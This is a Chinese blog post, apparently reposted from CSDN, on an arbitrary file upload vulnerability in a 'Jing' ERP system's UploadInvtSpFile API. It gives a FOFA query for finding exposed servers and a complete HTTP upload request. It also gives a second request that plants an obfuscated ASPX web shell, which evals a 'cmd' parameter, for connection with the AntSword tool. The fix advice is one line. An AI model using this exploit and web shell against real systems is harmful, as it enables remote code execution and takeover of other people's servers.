首页 > 其他分享 >某景ERP管理系统 UploadInvtSpFile 任意文件上传

某景ERP管理系统 UploadInvtSpFile 任意文件上传

时间:2024-09-15 14:50:05浏览次数:12  
标签:1111 ERP form data ------------------- Content Type 某景 UploadInvtSpFile

0x01 漏洞描述:

某景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。

0x02 搜索语句:

FOFA:body="/api/DBRecord/getDBRecords"

0x03 漏洞复现:

POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178

-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
Content-Type: image/png

<% response.write("helloWorld")%>
-------------------1111--

 

拼接响应路径访问

http://your-ip/InvtSpFiles/4f6d2ed2-57c5-44e1-9090-1317c2023761.asp

GetShell

POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178

-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.aspx"
Content-Type: image/png

<% function EfmB6149(){var GEPH="unsa",YACK="fe",C6E1=GEPH+YACK;return C6E1;}var PAY:String=Request["cmd"];~eval/*Zd0216312v*/(PAY,EfmB6149());%><%@Page Language = JS%>
-------------------1111--

 

蚁剑连接

 

0x04 修复建议:

厂商已发布补丁 请即时修复

标签:1111,ERP,form,data,-------------------,Content,Type,某景,UploadInvtSpFile
From: https://blog.csdn.net/xc_214/article/details/142252506

相关文章

  • 商混erp系统多接口sql注入漏洞复现
    0x01漏洞描述:        商混ERP系统是一种针对混凝土行业开发的综合性企业资源规划(ERP)系统。它集成了生产、销售、采购、财务等各个方面的功能,为混凝土生产企业提供了一个全面、高效的数字化管理平台。在Operater_Action.aspx,StockreceiveEdit.aspx接口中存在sql注入,高......
  • 设计模式-解释器模式-Interpreter Pattern
    系列文章目录总目录链接文章目录系列文章目录总目录链接设计模式-解释器模式-InterpreterPatternOverview1.解释器模式(InterpreterPattern)1.1.组成要素1.2.适用场景1.3.优点1.4.缺点1.5.示例代码(C++)2.解释器模式优缺点2.1.优点2.2.缺点3.解释器模式在实际开发中......
  • SERP代理如何提高排名跟踪效率?
    一、什么是SERP代理?SERP代理是指专门用于访问搜索引擎结果页面(SERP)的代理服务器。这些代理服务器能够模拟真实的用户请求,从而避免因频繁查询或位置变化而导致IP被封禁或数据不准确。通过使用SERP代理,您可以获取不同地理位置、不同设备上的搜索引擎结果,从而获得更全面、更准......
  • COMP3760/6760: Enterprise Systems Integration
    COMP3760/6760:EnterpriseSystemsIntegrationAssignment 1(10%of thesemester)Semester 2,2024TheAggregatorModelof eBusinessConsiderthebusinessmodelofShippit(appendix1).Explainhowactingasanaggregator,thecompanymakesstrategicuseo......
  • ERP的MPS如何设计,它关系到哪些画面,各自之间的关系是什么,如何根据订单生成工单、物料需
    在ERP系统中,主生产计划(MPS,MasterProductionSchedule)的设计是核心环节之一,主要用于确定生产和物料的需求。MPS通常依赖于客户订单、预测需求以及库存情况来生成一个综合的生产计划。其设计涉及多个模块或画面,以下是MPS设计的关键流程和模块:1.MPS设计的模块和画面MPS系统通......
  • Interpreter 设计模式
    实际用途:简单的计算器假设我们要实现一个简单的计算器,可以解析并计算基本的数学表达式,包括加法、减法、乘法和除法。这个计算器将能够处理表达式如"3+5*(2-8)"。使用解释器模式的代码示例1.表达式接口java复制代码interfaceExpression{intinterpret();}......
  • dotnet 测试在 Linux 系统上的 Environment.GetFolderPath 行为
    由于Environment.GetFolderPath可以传入的参数里面,有许多都是Windows系统特有的,在Linux上不存在的,也没有映射对应的文件夹。本文将在WSLDebian和UOS系统上测试Environment.GetFolderPath行为测试使用Environment.SpecialFolder的各个枚举获取路径的代码如下......
  • 旺店通ERP集成用友T+(用友T+主供应链)
    源系统成集云目标系统用友T+介绍用友T+是一款由用友畅捷通推出的新型互联网企业管理系统,它主要满足成长型小微企业对其灵活业务流程的管控需求,并重点解决往来业务管理、订单跟踪、资金、库存等管理难题。旺店通介绍旺店通ERP系统是一款专门为电商企业量身定制的SaaS管理软件,旨在提......
  • FIT9137 An Enterprise Network Design
    FIT9137Assignment2SubmissionGuidelinesAssignment2 isworth 25% of theUnit Marks.Deadline:Week-8–Friday, 13th September 2024, 11:55PM (Melbournetime)● Submissionformatanddetails: You must submit exactlytwo files with the ......
  • 箱包工厂管理ERP对企业的意义是什么
     在当今竞争激烈的商业环境中,企业不断寻求高效、精确的管理工具以保持竞争力。对于箱包制造业而言,引入专业的ERP系统如万达宝箱包工厂管理ERP,是实现这一目标的重要步骤。pcbuksd这种定制化的ERP解决方案为企业带来的益处多方面且深远,它不仅优化了生产流程,还提高了资源利用效率,增......